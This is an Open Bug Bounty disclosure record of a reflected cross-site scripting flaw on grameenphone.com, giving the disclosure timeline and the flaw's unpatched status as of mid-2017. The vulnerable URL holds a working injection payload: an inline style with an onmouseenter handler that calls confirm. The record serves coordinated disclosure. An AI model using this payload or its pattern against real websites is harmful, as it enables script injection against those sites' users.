grameenphone.com XSS vulnerability

2017-01-01T18:47:00
ID OBB:202068
Type openbugbounty
Reporter TestimeOO7
Modified 2017-01-12T08:14:00

Description

Vulnerable URL:
https://www.grameenphone.com/search/node/11/%27%22%20/Style%3Dposition%3Afixed%3Btop%3A0%3Bleft%3A0%3Bfont-size%3A999px%3B%20/Onmouseenter%3Dconfirm%60openbugbounty%60%20
Details:

Description| Value
---|---
Patched:| No
Latest check for patch:| 30.07.2017
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| 6874
VIP website status:| Yes
Check grameenphone.com SSL connection:| (Grade: C)

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability submitted via Open Bug Bounty| 1 January, 2017 18:47 GMT
Vulnerability existence verified and confirmed| 5 January, 2017 08:08 GMT
Generic security notifications sent to website owner| 5 January, 2017 08:08 GMT
Notification sent to subscribers (without technical details)| 5 January, 2017 10:17 GMT
Vulnerability details disclosed by researcher| 12 January, 2017 08:14 GMT